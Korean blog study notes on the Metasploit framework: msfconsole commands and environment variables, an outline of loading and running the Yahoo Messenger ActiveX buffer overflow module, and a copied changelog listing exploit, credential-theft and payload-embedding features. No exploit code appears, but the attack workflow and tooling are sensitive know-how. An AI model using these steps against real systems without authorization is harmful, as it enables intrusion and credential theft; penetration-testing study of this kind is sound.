2011. 10. 6. 21:16

windows/browser/yahoomessenger_server



show exploits 명령 : 사용 가능한 공격 모듈 리스트를 알려준다.



우리가 공격하고자 하는 대상은
Yahoo Messenger ..~~.. ActiveX Control Buffer Overflow


먼저
info명령 : 공격모듈에 대한 여러 가지 다양한 정보를 얻을 수 있다. 즉, 공격가능한 플랫폼과 필요 조건, 페이로드에 대한 상세한 정보, 공격에 대한 설명, 외부 정보 소스와의 관계 정보를 얻을 수 있다.



msfconsole 인터페이스에서는,
페이로드, NOP, 인코더에 대한 자세한 정보를 제공해 준다. 페이로드 정보를 제공하는 섹션에서는 페이로드를 위한 공간의 크기, 페이로드 생성과정에서 회피된 문자 개수와 키 정보를 보여준다. MSF 엔진 키는 공격시에 어떤 페이로드를 이용할 것인지 판단하는 데 이용된다. NOP 정보를 제공하는 섹션에서는 키 정보뿐만 아니라 NOP sled에 의해 변경되면 안 되는 레지스터 정보를 보여준다.


use 명령어 > 공격모듈을 로드하도록 한다. 공격모듈을 선택하면 전역환경 위로 임시환경이 로드된다. 임시환경은 전역 환경의 모든 변수를 물려받으며, 임시 환경변수와 전역 환경 변수간에 이름이 충돌될 경우에는 임시 환경변수가 우선권을 갖는다.

공격 모듈을 선택하면 msfconsole 인터페이스는 메인모드에서 공격모드로 전환된다.



공격모드에서 show명령은 사용가능한 공격 모듈, 인코더, 그리고 NOP의 리스트 정보를 보여주는 대신에 공격 모듈에 대한 특정 정보를 보여준다.


help는 공격 모드에서 사용 가능한 명령 리스트를 보여준다.





공격 모드에서 show 명령의 인자로 targets, payloads, option, advance

show targets 으로 우리가 선택한 공격모듈인 yahoo의 유효한 공격 플랫폼 리스트를 보여준다. msf에서는 공격대상 애플리케이션이 동작하고 있는 원격지 플랫폼의 종류에 따라 공격설정이 달라지며, msf엔진은 선택한 공격 플랫폼을 근거로 공격을 구성한다.
우리는 target으로




ddd




show payloads





check 명령은 원격지 호스트에 대한 특정한 보안 취약점을 검사할 때 사용하는데, 모든 공격 모듈이 check기능을 지원하는 것은 아니다.
이 공격은 check 기능을 지원하지 않는다.




exploit







<MSFCONSOLE 인터페이스에서의 공격 과정>
1. 디폴트 인코더와 NOP 생성기를 설정한다.
2. 사용 가능한 공격 모듈 리스트를 출력한다.
3. 공격 모듈을 선택한다.
4. 공격 대상 플랫폼을 선택한다.
5공격 옵션을 설저한다.
6. 고급 옵션을 설정한다.
7. 페이로드를 설정한다.
8. check 명령을 수행한다.
9. 공격을 실행한다.






























Posted by Triany
2011. 10. 6. 18:35
출처 : 오픈소스 툴킷을 이용한 실전해킹 절대 내공 _ Johnny Long

msfconsole interface


- 가장 강력한 인터페이스인 msfconsole은 프레임워크 환경에 대한 세밀한 제어와 공격 모듈에 대한 옵션 설정, 그리고 공격 실행을 위한 대화형 커맨드 라인을 제공한다.



msfconsole 명령
[도움말] help
help명령을 이용해 도움말 메뉴를 참조할 수 있다.


[인터페이스 종료] exit, quit
msf > exit
msf > quit


[reload]
msfconsole 인터페이스를 실행 중에 공격 또는 페이로드가 업데이트 되는 경우에는 reload명령으로 해당 업데이트를 수행할 수 있다.
_.command..: 이상하게, 나는,, 내 4.0 버전에서는 reload명령이 Unknown command : reload라고 뜬다.. 왜일까??

[version]
msfconsole 인터페이스의 버전을 알려준다.



[cd 명령]
msfconsole이 정의되지 않은 명령을 실행하고자 할 때 사용한다. 이는 콘솔을 종료하지 않고 nmap이나 Nitko와 같은 다른 툴을 실행할 수 있으므로 침투 테스트 과정에 매우 유용하다. ls와 같은 명령은 msfconsole에서는 구현되지 않았다. 우리의 공격에서는 명령이 Cygwin환경으로 전달되어 처리된다.



MSF 환경
위 msfconsole인터페이스는 인터페이스 자체에 대한 설정, 공격 옵션 설정, 페이로드 옵션 설정을 위해 이를 이용하며 공격 모듈과 프레임워크 엔진 간에 정보를 전달할 때도 이를 이용한다.
환경 변수는 전역(global) 환경 변수와 임시(temporary) 환경 변수로 나뉜다.
setg 명령과 unsetg명령은 전역 환경 변수를 설정할 때 사용한다.
공격 모듈이 로드될 때는 임시 환경 변수 또한 함께 로드된다.
전역 환경 변수와 임시 환경 변수간의 중복으로 충돌이 발생될 때는 임시 환경 변수의 값이 이용된다.

[setg] 전역 환경 변수의 값을 설정, 전역 환경변수들의 내용을 출력
ex )
 msf > setg RHOST 192.168.1.1
 RHOST -> 192.168.1.1

 msf > setg
 AlternateExit : 2
 DebugLevel : 0
 Encoder : Msf::Encoder::PexFnstenvMov
 Logging : 0
 Nop: Msf::Nop::Pex
 RHOST : 192.168.1.1
 RandomNops: 1

      command : ->나의 경우는 setg해 놓은 것이 아무것도 없기에, No entries in data store. 이라는 명령어가 떳다.

[unsetg] 명렁어의 경우 전역 환경 변수의 값을 해제해 준다.
 ex)
  msf > unsetg RHOST
 
  msf > setg
  AlternateExit : 2
  DebugLevel : 0
  Encoder : Msf::Encoder::PexFnstenvMov
  Logging : 0
  Nop: Msf::Nop::Pex
  RandomNops: 1


[save]명령은 모든 전역, 임시 환경 변수를 /.msf/config에 저장하는데, 인터페이스가 실행될 때마다 이 저장된 환경 변수들은 다시 로드된다.


   메타스플로이트 프레임워크 환경 변수
일반적으로 사용자 정의 옵션은 대문자를 이용하여 고급 옵션인 경우에는 대소문자를 섞어 사용한다.

프레임워크 옵션은 대소문자를 섞어 사용하며 내부 변수는 밑줄('_')로 시작한다.



   [ General ]

   EnablePython 
   -InlineEgg 라이브러리를 이용해 파이썬으로 작성한 외부 페이로드를 사용할 것인지를 설정하는 변수다. 모듈의 로딩이 지연되는 것을 방지하기 위한 이 변수의 디폴트 값은 Disable이지만, InlineEgg 라이브러리를 이용한 페이로드를 사용하려면 이 변수 값을 Enable시켜야 한다.

   DebugLevel
   - 디버그 메시지의 설명 정보 수준을 설정하는 변수다. 0(디폴트 값)으로 설정하면 아무런 디버그 메시지도 출력하지 않는다. 가장 높은 수준(가장 자세히 디버그 메시지 출력)은 5이다.

   Logging
   - 모든 실행 동작과 성공적인 공격 세션들에 대해 로그를 남길 것인지를 결정하는 변수다. 실행 동작에 대한 로그는 공격 모듀내에서 exploit()이나 check()함수를 실행시키기 위한 모든 시도에대한 로그다. 세션에 대한 로그는 성공적인 공격 세션에서 각 명령이 실행되고 응답된 정확한 시간을 포함한다. 세션 로그의 내용은 msflogdump 명령으로 볼 수 있다.

  LogDir
  - 세션 로그가 저장되는 디렉토리 경로를 설정한다. 디폴트 값은 ~/.msf의 하위 디렉토리인 logs다.

  AlternateExit
  - 펄 인터프리터의 버그에 의해 프레임워크가 종료될 때 세그먼트 폴트(Segmentation fault)가 발생되는 것을 방지하기 위해 사용된다. 이 변수값을 2로 설정하면 종료시에 세그먼트 폴트 메시지가 발생하지 않는다.



[ Sockets ]

  UdpSourcelp
  - 모든 UDP 요청이 사용하는 Source IP 주소를 설정한다.(spoof).
  
  ForceSSL
  - 모든 TCP 연결이 SSL을 이용하도록 강제한다.
 
  ConnectTimeout
  - 소켓 연결 타임아웃(timeout)값을 설정한다.

  RecvTimeout
  - Recv(-l)에 대한 타임아웃 값을 설정한다.

  RecvTimeoutLoop
  - 초기 데이터 이후의 Recv(-l) 루프(loop)에 대한 타임아웃값을 설정한다.

  Proxies
  - TCP 소켓에 대한 여러 가지 프록시 모드를 설정한다. 프록시 문자열은 TYPE:HOST:PORT:<extra fields>의 형태로 작성되야 한다. 각 프록시 설정은 '.'로 구분되며 설정된 순서대로 사용된다.




[ Encoders ]

 Encoder
  - 인코더(Encoder)를 선택할 때 사용된다.(전체경로).
 
 EncoderDontFallThought 
  - 설정된 인코더 모듈이 실패를 계속 하지 않도록 한다.





[ Nops ]
 
   Nop
   - 특정한 NOP 모듈을 선택할 때 사용된다.(전체 경로).
 
  NopDontFallThrough
  - 설정된 NOP 모듈이 실패를 계속하지 않게 한다.

  RandomNops
  - 가능하면 x86 NOP sled를 무작위 추출한다.





 [ Socket Ninja ]
 
 NinjaHost
 - socketNinja 콘솔의 주소

 NinjaPort
 - socketNinja 콘솔의 포트

 NinjaDontKill
 - socketNinja 접속이 이루어진 후에 공격을 종료하지 않는다.(multi-own).





[ 내부 변수(Internal Variables) ]

다음 변수들은 사용자가 설정하거나 모듈 내에서 사용하면 안 된다.

  _Exploits
    로드된 공격의 모듈의 해시를 저장하는 데 사용된다.

  _Payloads
    로드된 페이로드의 해시를 저장하는 데 사용된다.

  _Nops
    로드된 NOP의 해시를 저장하는 데 사용된다.

  _Encoders
    로드된 인코더의 해시를 저장하는 데 사용된다.

  _Exploit
    현재 선택된 공격 모듈을 저장하는 데 사용된다.

  _Payload
    현재 선택된 페이로드를 저장하는 데 사용된다.

  _PayloadName
    현재 선택된 페이로드의 이름

  _BrowserSocket
    브라우저로 귀환하는 소켓에 대한 추적을 위해 msfwef인터페이스에서 사용된다. //현재 지원 안함

   _Console
     UI간의 콘솔 클래스를 재정의하는데 사용된다.


show 명령은 exploits, payloads, encoders, NOPs 중에서 하나의 인자를 이용한다. msfweb 인터페이스에서는 디폴트 인코더와 NOP 생성기를 콤보 박스를 이용해 변경할 수 있다. msfconsole 인터페이스에서도 이를 변경할 수 있지만, 이 경우에는 커맨드 라인을 통해 변경해야 한다.

디폴트 NOP 생성기를 Opty2 알고리즘을 이용하는 NOP 생성기로 바꾸려면 먼저 현재 설정된 NOP 생성기를 setg 명령을 통해 확인해야 한다. 다음에는 show 명령으로 사용 가능한 NOP 생성기 리스트를 출력한다. 마지막으로
setg Nop Msf::Nop::Opty2 명령어를 이용해 디폴트 NOP 생성기를 변경한다.

msf > setg Nops Msf::Nop::Opty2
Nops -> Msf::Nop::Opty2
msf >
Posted by Triany
2011. 10. 6. 18:12

SOURCE :http://mac.softpedia.com/progChangelog/Metasploit-Framework-Changelog-[29516.html



What's new in Metasploit Framework 3.5.1:


· The msfweb interface is no longer included.
This interface was marked as unsupported 12 months ago and no suitable replacements were found.



· The msfcli interface is now a thin wrapper around msfconsole.
  auxiliary modules and passive exploits now work.




Armitage:
Armitage integrates with Metasploit 4.0 to:
· Take advantage of the new Meterpreter payload stagers
· Crack credentials with the click of a button
· Run post modules against multiple hosts
· Automatically log all post-exploitation activity




Metasploit Framework 3.3.3 Exploit Rankings

This morning we released version 3.3.3 of the Metasploit Framework - this release focuses on exploit rankings, session automation, and bug fixes. The exploit rank indicates how reliable the exploit is and how likely it is for the exploit to have a negative impact on the target system. This ranking can be used to prevent exploits below a certain rank from being used and limit the impact to a particular target.










What's new in Metasploit Framework 4.0.0:

August 4th, 2011

Statistics:
· Metasploit now ships with 716 exploit modules, 361 auxiliary modules, and 68 post modules.
· 20 new exploits, 3 new auxiliary modules, and 14 new post modules have been added since the last release (3.7.2)

Highlights & New Features:
· This release marks the first major version change in five years. Please see the blog for more information.
· Several import parsers were rewritten to use Nokogiri for much faster processing of large import files.
· Adding to Metasploit's extensive payload support, Windows and Java Meterpreter now both support staging over http and Windows can use https. In a similar vein, POSIX Meterpreter is seeing some new development again. It still isn't perfect nor is it nearly as complete as the Windows version, but many features already work.
· Java applet signing is now done directly in ruby, removing the need for a JDK for generating self-signed certificates.
· The Linux installers now ship with ruby headers, making it possible to install native gems in the Metasploit ruby environment.
· On a related note, Linux installers also ship with a working pcaprub extension. Expect pcap support in Windows to come later: #5117.

New Modules since 3.7.2:
New Exploit Modules:
· VSFTPD v2.3.4 Backdoor Command Execution
· Java RMI Server Insecure Default Configuration Java Code Execution
· HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
· HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
· Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability
· Black Ice Cover Page ActiveX Control Arbitrary File Download
· Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
· MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
· Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview
· RealWin SCADA Server DATAC Login Buffer Overflow
· Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
· Iconics GENESIS32 Integer overflow version 9.21.201.01
· Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
· Sielco Sistemi Winlog Buffer Overflow
· Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
· HP OmniInet.exe Opcode 20 Buffer Overflow
· HP OmniInet.exe Opcode 27 Buffer Overflow
· Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
· Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview

New Post-Exploitation Modules:
· Winlogon Lockout Credential Keylogger
· Windows Gather Microsoft Outlook Saved Password Extraction
· Windows Gather Process Memory Grep
· Windows Gather Trillian Password Extractor
· Windows PCI Hardware Enumeration
· Windows Gather FlashFXP Saved Password Extraction
· Windows Gather Local and Domain Controller Account Password Hashes
· Windows Gather Nimbuzz Instant Messenger Password Extractor
· Windows Gather CoreFTP Saved Password Extraction
· Internet Download Manager (IDM) Password Extractor
· Windows Gather SmartFTP Saved Password Extraction
· Windows Gather Bitcoin wallet.dat
· Windows Gather Service Info Enumeration
· Windows Gather IPSwitch iMail User Data Enumeration

New Auxiliary Modules:
· John the Ripper Password Cracker Fast Mode
· Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
· Kaillera 0.86 Server Denial of Service
· 2Wire Cross-Site Request Forgery Password Reset Vulnerability
· SIPDroid Extension Grabber
· MSSQL Password Hashdump

Notable Features & Closed Bugs:
· Feature #4982 - Support for custom executable with psexec
· Feature #4856 - RegLoadKey and RegUnLoadKey functions for the Meterpreter stdapi
· Feature #4578 - Update Nmap XML parsers to support Nokogiri parsing
· Feature #4417 - Post exploitation module to harvest OpenSSH credentials
· Feature #4015 - Increase test coverage for railgun
· Bug #4963 - Rework db_* commands for consistency
· Bug #4892 - non-windows meterpreters upload into the wrong filename
· Bug #4296 - Meterpreter stdapi registry functions create key if one doesn't exist
· Bug #3565 - framework installer fails on RHEL (postgres taking too long to start)

Armitage:
Armitage integrates with Metasploit 4.0 to:
· Take advantage of the new Meterpreter payload stagers
· Crack credentials with the click of a button
· Run post modules against multiple hosts
· Automatically log all post-exploitation activity



What's new in Metasploit Framework 3.7.0:

May 5th, 2011

Statistics:
· Metasploit now ships with 685 exploit modules, 355 auxiliary modules, and 39 post modules.
· 35 new exploits, 17 post-exploitation modules, and 15 auxiliary modules have been added since the last release.

Highlights & New Features:
Feature highlights:
· Support for SMB signing, enabling pass-the-hash and stolen password attacks against Windows 2008 Server environments.
· The Microsoft SQL Server mixin (and all modules) now supports NTLM authentication.
· Data import backend has undergone a rewrite, speeding up most import tasks by a factor of four.
· OS information is now normalized to make fingerprinting more accurate and easier to deal with.

Highlights from the new modules include:
· Apple iOS Backup File Extraction: Extract sensitive data from iTunes backup files (location, call history, SMS content, pictures, etc).
· Exploits for two different Adobe Flash vulnerabilities exploited in the wild.
· Code execution modules for MySQL and PostgreSQL when a valid login is available.
· Exploit for the Accellion File Transfer Appliance Default Encryption Key flaw found by Rapid7.
· Over ten new exploits for HP Network Node Manager (plus an HP OpenView exploit).
· Post-exploitation module for privilege escalation through the .NET Optimizer Service.
· Post-exploitation modules for stealing stored WinSCP and VNC passwords.



What's new in Metasploit Framework 3.5.1:

December 16th, 2010

· Statistics
· Metasploit now has 613 exploit modules and 306 auxiliary modules (from 551 and 261 respectively in v3.4)
· Metasploit is still about twice the size of the nearest Ruby application according to Ohloh.net (480K lines of Ruby)
· Over 85 tickets were closed since the last point release and over 130 since v3.4.0
· General
· Sessions now include additional information by default. This is often the username/hostname of the remote session.
· Dead sessions are now automatically detected and closed without requiring user interaction.
· The msfcli interface is now a thin wrapper around msfconsole; auxiliary modules and passive exploits now work.
· All modules now track which local user launched them (via module.owner)
· Resolve Windows error codes intro descriptive strings
· Automatically choose a preferred "reverse" payload if non was specified
· Warn the user if an antivirus program has corrupted the installation (EICAR canary)
· A socks4a proxy auxiliary module is available capable of routing through a meterpreter session
· Host names will now resolve properly on Windows with Ruby 1.9.1+
· Improved performance and accuracy of FTP and telnet brute force scanners
· Payloads
· Java Meterpreter is now available for some Java exploits such as exploit/multi/browser/java_trusted_chain
· A race condition in concurrent incoming session handling has been fixed
· The reverse_https stager is more reliable through an additional wfs_delay
· The ReverseListenerBindAddress option can be used to override LHOST as the local bind address for reverse connect payloads
· The ReverseListenerComm option can be set to "local" to prevent the listener from binding through a Meterpreter pivot
· Bug fixes for proper socket cleanup in exploit and auxiliary modules, even after exceptions are thrown
· Allow the IPv6 Bind stagers to work over Toredo tunnels
· Plugins
· Lab plugin added to manage target VM's
· Support for managing Nessus scans from the console via Zate Berg's plugin
· Meterpreter Scripts
· All scripts now run in the context of an anonymous class, with access to shared methods
· A script has been added by scriptjunkie for automatically exploiting weak service permissions
· Tab completion for the "run" command now looks in ~/.msf3/scripts/meterpreter/
· All credential-related tools (credcollect, hashdump, etc) now use the new creds database table
· Meterpreter Core
· Only a single SSL certificate is generated for all Meterpreter sessions per instance of Metasploit
· The AutoSystemInfo option can be disabled if username, hostname, and admin status should not be automatically obtained
· RAILGUN has been merged into the STDAPI extension and x64 support has been added
· Support slow/laggy connections better through extended timeouts
· Automatically closed file, register, process, thread, and event handles through finalizers
· Search for files (using the Windows index where available)
· Database
· A new db_export command has been added that produces db_import compatible XML snapshots of a given workspace
· Web sites and web application data is now stored in the web_sites, web_pages, web_forms, and web_vulns tables
· Import of both NeXpose Raw XML and NeXpose Simple XML has been improved
· Import support has been added for Retina and NetSparker XML
· The Nessusv2 XML format now uses an improved SAX-based parser
· The connection pool size has been reduced to match PostgreSQL defaults
· Cracked credentials now have their own database table (creds) instead of being a subclass of notes
· New exploited_hosts table added to streamline bookkeeping of successful session generation
· db_import more robust in the face of badly-formatted data
· report_note and report_vuln now automatically create associated hosts and services in the database if absent
· GUI
· A new Java GUI has been created to replace the GTK interface, which relied on unmaintained and buggy libraries
· The new GUI uses the XMLRPC interface to control Metasploit
· It supports launching modules, viewing running jobs and sessions, and interacting with sessions
· It can generate, encode, and save payloads with the features of msfencode
· It integrates support for most Meterpreter scripts
· It provides support for handling plugins
· It supports database connection, and allows viewing the database as well as limited interaction with the database
· Deprecated
· The msfweb interface is no longer included. This interface was marked as unsupported 12 months ago and no suitable replacements were found.
· The GTK interface is no longer included and has been replaced by scriptjunkie's Java GUI that uses the XMLRPC protocol.
· The sqlite3 backend is no longer supported and may be removed entirely in an upcoming point release. Use PostgreSQL or MySQL instead.
· The VNC stage for the old DLL injection stager (patchup) has been removed due to compatibility issues
· Deprecated specific filetypes for db_import_* commands; users should use just "db_import"



What's new in Metasploit Framework 3.4.1:

October 20th, 2010

Statistics:
· Metasploit now has 551 exploit modules and 261 auxiliary modules (from 445 and 216 respectively in v3.3)
· Metasploit is still about twice the size of the nearest Ruby application according to Ohloh.net (400K lines of Ruby)
· Over 100 tickets were closed since the last point release and over 200 since v3.3

General:
· The dns_enum auxiliary module now supports bruteforcing IPv6 AAAA records thanks to a patch from Rob Fuller
· Command shell sessions can now be automated via scripts using an API similar to Meterpreter
· The console can be automated using Ruby code blocks within resource files
· Initial sound support is available by loading the "sounds" plugin
· The Report mixin and report_* methods are now one-way, you can write to the database but not work with the results. This increases the scalability of the database.
· Many modules report information to the database by default now (auxiliary/scanner/*)
· Lotus Domino version, login bruteforce, and hash collector auxiliary modules
· Upgrade any command shell session to Meterpreter via sessions -u (Windows only)
· The VNC injection payload now uses the latest TightVNC codebase and bypasses Session 0 isolation
· Several modules were renamed to include their Microsoft Technet bulletin number, e.g. ie_xml_corruption is now ms08_078_xml_corruption
· Code can now interface directly with an installed Java Development Kit via a Java mixin. See the java_signed_applet exploit for an example.
· Tomcat and JBoss installations can be exploited to gain sessions (Windows x86/x64, Linux x86/x64)
· The msfencode utility can now generate WAR payloads for Tomcat and JBoss
· Oracle XDB SID brute forcing is much more comprehensive thanks to Thomas Ring
· The msfencode utility can now inject into an existing executable while keeping the original functionality
· The XMLRPC server has been improved and additional APIs are available
· The db_import command now supports NeXpose Simple XML, NeXpose Export XML, Nessus (NBE, XMLv1, XMLv2), QualysGuard XML, and Nmap
· The sqlite3 driver has been deprecated. To ease the transition away from sqlite3, the postgres driver is installed by default in the Linux installer.
· There is a new db_status command that shows which driver is currently in use and whether your database connection is active

Bruteforce Support:
· Account brute forcing has been standardized across all login modules
· Login and version scanning module names have been standardized
· The SSH protocol is now supported for brute force and fingerprint scans
· The telnet_login and ssh_login modules now create sessions
· MySQL is now supported for brute forcing, enumeration, service fingerprinting, and arbitrary SQL queries
· Postgres fingerprinting (pre-authentication) using the line numbers in the error messages
· Tomcat is now supported for brute forcing and session creation

Meterpreter:
· The Meterpreter process management APIs and commands can now see all processes on WinNT 4.0 -> Windows 7 (32 & 64)
· The Meterpreter can now migrate from 32 to 64 and from 64 to 32, in addition to using a new mechanism to do the migration.
· The Meterpreter adds the steal_token, drop_token, getprivs, and getsystem commands (including kitrap0d integration)
· The Meterpreter pivoting system now supports bidirectional UDP and TCP sockets
· The Meterpreter protocol handle now supports ZLIB compression of data blocks
· The Meterpreter can now take screenshots (jpeg) without process migration and bypasses Session 0 isolation
· The Meterpreter can now stage over a full-encrypted SSL 3.0 connection using the reverse_https stager
· The Meterpreter and Command Shell scripts are now evaluated in the context of a new Rex::Script object
· The "hashdump" Meterpreter script provides a safe way to dump hashes for the local user accounts
· Automatically route through new subnets with the auto_add_route plugin

Known issues:
· To deal with the myriad database synchronization issues, particularly in the sqlite3 driver, the database is write-only for the most part.
· When gems containing non-UTF8 characters are installed on the system, starting the framework fails with Encoding::UndefinedConversionError in ruby 1.9.x; this is bug #1914
· Interacting with a Meterpreter session while it is in the middle of migrating will cause the migration to fail and kill the session; this is bug #1360
· In some cases, backgrounded sessions have no output handle and can potentially lose data that should be printed to the console; this is bug #1982.



What's new in Metasploit Framework 3.3.3:

March 31st, 2010

· All exploits now contain a ranking that indicates how dangerous the default settings are to the target host.
· The search command now takes a -r option to specify a minimum ranking of modules to return.
· The db_autopwn and nexpose_scan commands now take a -R option to specify a minimum ranking of modules to run.
· The InitialAutoRunScript option has been added to Meterpreter, providing a way for exploits to specify required post-exploit tasks (migrate out of a dying process).
· jRuby 1.4.0 can be used to run some parts of the framework, however it is not supported or recommended at this time.
· The sessions command can now run a single command (-c) or a script (-s) on all open sessions at once.
· The Win32 EXE template is now smaller (37k from 88k).



What's new in Metasploit Framework 3.3.1:

December 6th, 2009

· Metasploit now has 453 exploit modules and 218 auxiliary modules (from 445 and 216 respectively in v3.3)
· Metasploit now integrates with all editions of NeXpose (see NeXpose_Plugin)
· The msfconsole now stores and loads history automatically
· The Linux installer now correctly unsets GEM_PATH to avoid gem installation conflicts
· Generated Windows executables are much more random and AV-resistant
· WMAP reporting now uses the notes table instead of a separate set of reporting tables
· Auxiliary scanners are now much more stable on Ruby 1.9.1
· Meterpreter migration sanity checks added
· The Windows installer now includes Nmap 5.10BETA1



What's new in Metasploit Framework 3.3:

November 17th, 2009

Statistics:
· Metasploit now has 443 exploit modules and 216 auxiliary modules (from 320 and 99 respectively in v3.2)
· Metasploit is still about twice the size of the nearest Ruby application according to Ohloh.net (375k lines of Ruby)
· Over 170 tickets were closed during the 3.3 development process

General:
· Ruby 1.9.1 is now supported and recommended
· Windows Vista and Windows 7 are now supported
· Major improvements in startup speed thanks to patches from Yoann Guillot

Windows:
· The msfconsole is now the primary user interface on Windows (using RXVT)
· The Windows installer now uses Ruby 1.9.1 (cygwin)
· The Windows installer now ships with Cygwin 1.7
· The Windows installer now comes in full and mini editions
· The Windows installer can be launched silently with /S /D=C:path
· The Windows installation is now portable and can be installed to USB
· The Windows installation works on 64-bit Windows if launched in Compatibility Mode
· The Windows installer now offers to install Nmap 5.0 for your convenience

Linux:
· Standalone Linux installers are now available for 32-bit and 64-bit Linux. These installers contain a complete execution environment, including Ruby 1.9.1, Subversion, and dependent libraries.
· The preferred installation location is /opt/metasploit3/msf3, please see the Ubuntu and generic Linux installation guides for more information.

msfconsole:
· The startup banner now includes the number of days since the last update and the svn revision
· The RbReadline library is used by default, allowing msfconsole to work on systems without libreadline
· The -L parameter to msfconsole now allows the system Readline to be used if necessary
· A new 'connect' command, similar to netcat, that can use meterpreter routes
· Colorized output on terminals that support it. This can be disabled (or forced on) with the 'color' command

msfencode:
· Win32 payloads can now be embedded into arbitrary executables using 'msfencode -t exe -x MYFILE.exe -o MYNEWFILE.exe'.
· Win64 payloads can now be embedded into arbitrary 64-bit executables using 'msfencode -a x64 -e x64/xor -t exe -o MYNEWFILE.exe'.
· The default executable size for generated Win32 binaries now depends on the size of data/templates/template.exe. As of the release, this file is approximately 80k.
· Payloads can be generated as VBS scripts using the -t vbs option to msfencode. Persistent (looping) payloads can be generated with -t loop-vbs.
· Payloads can be generated as VBA macros for embedding into Office documents. The output is in two parts, the first must be pasted into the Macro editor, the second (hex) must be pasted to the end of the word document.
· The x86/alpha_mixed and x86/alpha_upper encoders now accept the AllowWin32SEH option (boolean) to use a SEH GetPC stub and generate 100% alphanumeric output.

msfxmlrpcd:
· This is a standalone Metasploit server that accepts authenticated connections over SSL.
· The demonstration client, msfxmlrpc, can be used to call the remote API

Database:
· Database support is now active as long as rubygems and at least one database driver are installed. The only db_* plugins are no longer necessary and have been deprecated.
· The vulnerabilities table now references the host as the parent table and not the service. This allows vulnerability information to be ported that is not tied to an exposed service.

Exploits:
· All applicable exploits now have OSVDB references thanks to a major effort by Steve Tornio
· New aix/rpc_ttdbserverd_realpath exploit module, which targets latest versions of IBM AIX operating system (5.3.7 to 6.1.4)
· Support for the Oracle InstantClient Ruby driver as an exploit mixin
· Support for the TDS protocol (MSSQL/Sybase) using a custom native Ruby driver (MSSQL 2000 -> 2008)
· Extensive support for exploitation and post-exploitation tasks against Oracle databases
· Extensive support for exploitation and post-exploitation tasks against Microsoft SQL Server databases
· The browser_autopwn module was completely rewritten using much more robust fingerprinting methods
· SOCKS4, SOCKS5, and HTTP proxies work much better now

Payloads:
· The Windows stagers now support NX platforms by allocating RWX memory using VirtualAlloc. The stagers have been updated to perform reliable stage transfer without a middle stager requirement.
· The reverse_tcp stager now handles connection failures gracefully by calling EXITFUNC when the connection fails. This stager can also try to connect more than once, which is useful for unstable network connections. The default connect try is 5 and can be controlled via the ReverseConnectRetries advanced option. Setting this value to 255 will cause the stager to connect indefinitely.
· The reverse_tcp_allports stager has been added, this will cycle through all possible 65,535 ports trying to connect back to the Metasploit console
· The ExitThread EXITFUNC now works properly against newer versions of Windows
· The CMD payloads now indicate support for specific userland tools on a per-exploit level
· The Windows stagers now support Windows 7
· New payload modules for Linux on POWER/PowerPC/CBEA
· New payload modules for Java Server Pages (JSP)
· New payload modules for Windows x64
· New payload modules for IBM AIX operating systems (versions 5.3.7 to 6.1.4)

Auxiliary:
· Scanner modules now run each thread in its own isolated module instance
· Scanner modules now report their progress (configurable via the ShowProgress and ShowProgressPercent advanced options).
· A simple fuzzer API is now available as well as 15 example modules covering HTTP, SMB, TDS, DCERPC, WiFi, and SSH.
· Ryan Linn's HTTP NTLM capture module has been integrated
· Support for the DECT protocol and DECT mixins have been integrated (using the COM-ON-AIR hardware)
· Support for the Lorcon2 library including a new Ruby-Lorcon2 extension
· Addition of airpwn and dnspwn modules to perform spoofing with raw WiFi injection using Lorcon2
· The pcaprub extension has been updated to build and run properly under Ruby 1.9.1
· Max Moser's pSnuffle packet sniffing framework has been integrated into Metasploit

Meterpreter:
· The Meterpreter now uses Stephen Fewer's Reflective DLL Injection technique by default as opposed to the old method developed by skape and jt.
· The Meterpreter now uses OpenSSL to emulate a HTTPS connection once the staging process is complete. After metsrv.dll is initialized, the session is converted into a SSLv3 link using a randomly generated RSA key and certificate. The target side now sends a fake GET request through the SSL link to mimic the traffic patterns of a real HTTPS client.
· The Meterpreter AutoRunScript parameter now accepts script arguments and multiple scripts. Each script and its arguments should be separated by commas.
· The Meterpreter can now take screen shots using the 'espia' extension and the 'screenshot' command. To use this feature, enter "use espia" and "screenshot somepath.bmp" from the meterpreter prompt.
· The Meterpreter can now capture traffic on the target's network. This is handled in-memory using the MicroOLAP Packet SDK. This extension can buffer up to 200,000 packets at a time. To use this feature, enter "use sniffer" and "sniffer_start" from the meterpreter prompt.
· The Meterpreter now supports keystroke logging by migrating itself into a process on the target desktop and using the keyscan_start and keyscan_dump commands.
· The Meterpreter now supports the "rm" file system command.
· The Meterpreter now supports the "background" command for when Ctrl-Z isn't feasible.
· The Meterpreter now supports 64-bit Windows.
· Alexander Sotirov's METSVC has been added to the Metasploit tree and stub payloads are available to interact with it

Meterpreter POSIX:
· The basic framework for Meterpreter on Linux, BSD, and other POSIX platforms was completed by JR
· The stdapi extension has been partially ported to the POSIX platform

Meterpreter Scripts:
· All scripts now accept a "-h" argument to show usage

Deprecated:
· The msfgui interface is not actively maintained and is looking for a new community owner
· The msfweb interface is not actively maintained and is looking for a new community owner
· The msfopcode command line utility is disabled until the Opcode Database is updated
· The msfopcode client API is disabled until the Opcode Database is updated and restored






Wednesday, December 23, 2009

Metasploit Framework 3.3.3 Exploit Rankings

This morning we released version 3.3.3 of the Metasploit Framework - this release focuses on exploit rankings, session automation, and bug fixes. The exploit rank indicates how reliable the exploit is and how likely it is for the exploit to have a negative impact on the target system. This ranking can be used to prevent exploits below a certain rank from being used and limit the impact to a particular target.

The most basic use of ranking is the search command - this command now accepts the "-r" parameter, which takes an argument indicating the minimum ranking value to show. Valid ranks are excellent, great, good, normal, average, low, and manual. The wiki page goes into greater detail on what these levels actually mean. The following command would show all modules ranked as "great" or better:

msf> search -r great

From the console, the MinimumRank global option can be used to prevent less-reliable exploits from being run by accident. The following commands demonstrate this feature:

msf> setg MinimumRank excellent
msf> use exploit/windows/smb/ms08_067_netapi

msf (exploit/ms08_067_netapi) > exploit
